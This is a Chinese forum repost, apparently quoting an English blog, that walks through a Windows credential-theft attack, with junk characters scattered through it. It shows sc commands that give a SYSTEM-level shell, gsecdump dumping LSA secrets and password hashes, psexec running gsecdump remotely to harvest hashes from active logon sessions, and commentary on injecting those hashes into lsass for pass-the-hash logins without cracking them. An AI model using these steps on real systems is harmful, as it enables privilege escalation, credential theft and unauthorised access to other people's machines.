HASH注入式攻击

admin

o get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
8 U+ D, e2 S: X6 L% B[SC] CreateService SUCCESS
: ^* n6 ~; Z- D4 I' A5 s8 f
8 g1 w4 Z9 |4 S, ~* zC:\>sc start shellcmdline
! n; p( o3 n2 O$ }. a9 O[SC] StartService FAILED 1053:

: t, w% [9 u: @' n' c0 ]The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
. w( X9 G' r9 O0 j. d[SC] DeleteService SUCCESS
( |# E; V1 g1 i( [5 f8 }! e( P& ?
/ e( o0 z/ z% y; J0 z, m------------

Then in the new DOS window:
9 C3 N( g- f; |( V( m, }
/ p  u6 i; {) T' UMicrosoft Windows XP [Version 5.1.2600]
/ A% v2 A; u* T* O(C) Copyright 1985-2001 Microsoft Corp.
2 K! D! H2 N# ^
/ Z9 o+ ~1 K/ _+ y0 `; ?6 fC:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
" c- ]+ ?1 t; O. H$ `3 O
& `2 `$ s% T$ g7 w  U  uC:\WINDOWS\system32>gsecdump -h
1 Q3 {9 N2 B* f  y. q5 e! fgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
; B* H7 d; w# Musage: gsecdump [options]

& w, C3 q! T5 i0 H, Moptions:
" x9 Z  b& j% H! B% h-h [ --help ] show help
" O9 W4 D4 c' F0 T3 R/ t-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
# L$ R5 y. D+ D8 |8 `9 A-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

! v" A/ g, M7 u/ l4 T. d/ gAlthough I like to use:

PsExec v1.83 - Execute processes remotely
$ ^9 M# P* ^8 J3 ^3 x% a! aCopyright (C) 2001-2007 Mark Russinovich
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
' U: E6 y2 C& r: ^+ I. M' ^1 a- b, W' S
9 }: C! g" b1 U6 m$ ]C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
* k+ x1 F0 Y/ Y# i/ ?
* J8 E/ y$ @4 q# n2 F% t3 _to get the hashes from active logon sessions of a remote system.

5 Q* u5 B; b% YThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

3 M$ j& f- }! |8 ^3 g提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( {3 y' V$ W4 N- O
' S3 X4 I# ]) o我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。
! w; l; n: v3 ]8 w( M